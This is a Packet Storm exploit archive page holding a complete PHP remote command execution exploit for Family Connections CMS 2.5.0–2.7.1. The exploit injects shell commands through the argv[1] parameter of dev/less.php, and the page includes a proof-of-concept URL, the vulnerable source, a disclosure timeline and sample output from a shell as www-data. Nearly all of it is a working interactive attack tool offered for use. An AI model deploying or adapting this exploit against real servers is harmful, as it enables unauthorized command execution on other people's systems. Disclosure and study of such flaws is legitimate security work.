exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Family Connections CMS 2.7.1 Remote Command Execution

Family Connections CMS 2.7.1 Remote Command Execution
Posted Dec 4, 2011
Authored by mr_me

Family Connections CMS versions 2.5.0 through 2.7.1 remote command execution exploit.

tags | exploit, remote
SHA-256 | 7b902ce4491808e2e279cc0d6b557601481e9eaed0d3dcfb191a415b83f32004

Family Connections CMS 2.7.1 Remote Command Execution

Change Mirror Download
<?php
/*
Family connections CMS v2.5.0-v2.7.1 remote command execution exploit
vendor_________: https://www.familycms.com/
software link__: https://www.familycms.com/download.php
author_________: mr_me::rwx kru
email__________: steventhomasseeley!gmail!com
----------------------------------
php.ini requirements:
register_globals=On
register_argc_argv=Off

This bug is almost identical to CVE-2005-2651
poc: http://192.168.220.128/[path]/dev/less.php?argv[1]=|id;

The vulnerable code is on lines 20-36 in ./dev/less.php:
-->
$theme = isset($argv[1]) ? $argv[1] : 'default';

system("clear");

if (file_exists("$dir/themes/$theme/style.css"))
{
echo "\n[ themes/$theme/style.css ] already exists.\n\n";
echo "Overwrite [ y/n ] ? ";
$handle = fopen ("php://stdin","r");
$line = fgets($handle);
if (trim($line) != 'y')
{
exit;
}
}

$worked = system("php -q ~/bin/lessphp/lessc $dir/themes/$theme/dev.less > $dir/themes/$theme/style.css");
<--

Timeline:
- Nov 28th discovered and reported using ticket 407 (http://sourceforge.net/apps/trac/fam-connections/ticket/407)
- Dec 2nd, vendors stated that they will fix the issue
- Dec 4th, vendors keep pushing back release 2.7.2 with no proper planned date
- Dec 4th, Public disclosure
-----------------------------------
mr_me@gliese:~/pentest/web/0day/fcms$ php poc.php -t 192.168.220.128 /webapps/FCMS_2.7.1/ -p 127.0.0.1:8080

--------------------------------------------------------------------------------
Family Connections CMS v2.5.0-v2.7.1 (less.php) remote command execution exploit
by mr_me of rwx kru - net-ninja.net / rwx.biz.nf
--------------------------------------------------------------------------------
(+) Setting the proxy to 127.0.0.1:8080

mr_me@192.168.220.128# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
mr_me@192.168.220.128# uname -a
Linux steve-web-server 2.6.35-31-generic #62-Ubuntu SMP Tue Nov 8 14:00:30 UTC 2011 i686 GNU/Linux
mr_me@192.168.220.128# q
*/

print_r("
--------------------------------------------------------------------------------
Family Connections CMS v2.5.0-v2.7.1 (less.php) remote command execution exploit
by mr_me of rwx kru - net-ninja.net / rwx.biz.nf
--------------------------------------------------------------------------------
");

if ($argc < 3) {
print_r("
-----------------------------------------------------------------------------
Usage: php ".$argv[0]." -t <host:ip> -d <path> OPTIONS
host: target server (ip/hostname)
path: directory path to wordpress
Options:
-p[ip:port]: specify a proxy
Example:
php ".$argv[0]." -t 192.168.1.5 -d /wp/ -p 127.0.0.1:8080
php ".$argv[0]." -t 192.168.1.5 -d /wp/
-----------------------------------------------------------------------------
"); die;
}

error_reporting(7);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 5);

$proxy_regex = "(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b)";

function setArgs($argv){
$_ARG = array();
foreach ($argv as $arg){
if (ereg("--([^=]+)=(.*)", $arg, $reg)){
$_ARG[$reg[1]] = $reg[2];
}elseif(ereg("^-([a-zA-Z0-9])", $arg, $reg)){
$_ARG[$reg[1]] = "true";
}else {
$_ARG["input"][] = $arg;
}
}
return $_ARG;
}


$myArgs = setArgs($argv);
$host = $myArgs["input"]["1"];
$path = $myArgs["input"]["2"];

if (strpos($host, ":") == true){
$hostAndPort = explode(":",$myArgs["input"][1]);
$host = $hostAndPort[0];
$port = (int)$hostAndPort[1];
}else{
$port = 80;
}


if(strcmp($myArgs["p"],"true") === 0){
$proxyAndPort = explode(":",$myArgs["input"][3]);
$proxy = $proxyAndPort[0];
$pport = $proxyAndPort[1];
echo "(+) Setting the proxy to ".$proxy.":".$pport."\r\n";
}else{
echo "(-) Warning, a proxy was not set\r\n";
}

// rgods sendpacketii() function
function sendpacket($packet){
global $myArgs, $proxy, $host, $pport, $port, $html, $proxy_regex;
if (strcmp($myArgs["p"],"true") != 0) {
$ock = fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo "(-) No response from ".$host.":".$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo "(-) Not a valid proxy...\n"; die;
}
$ock=fsockopen($proxy,$pport);
if (!$ock) {
echo "(-) No response from proxy..."; die;
}
}
fputs($ock,$packet);
if ($proxy == "") {
$html = "";
while (!feof($ock)) {
$html .= fgets($ock);
}
}else {
$html = "";
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a), $html))) {
$html .= fread($ock,1);
}
}
fclose($ock);
}

if (strcmp($myArgs["p"], "true") != 0) {$p = $path;} else {$p = "http://".$host.":".$port.$path;}

function read(){
$fp1 = fopen("/dev/stdin", "r");
$input = fgets($fp1, 255);
fclose($fp1);
return $input;
}

while ($cmd != "q"){
echo "\n".get_current_user()."@".$host."# ";
$cmd = trim(read());
$c = urlencode("echo fcms_start;".$cmd.";echo fcms_end");
$packet = "GET ".$p."dev/less.php?argv[1]=|".$c."; HTTP/1.1\r\n";
$packet .= "host: ".$host."\r\n\r\n";
if ($cmd != "q"){
sendpacket($packet);
$html = explode("fcms_start",$html);
$___response = explode("fcms_end",$html[2]);
echo (trim($___response[0]));
}
}
?>

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close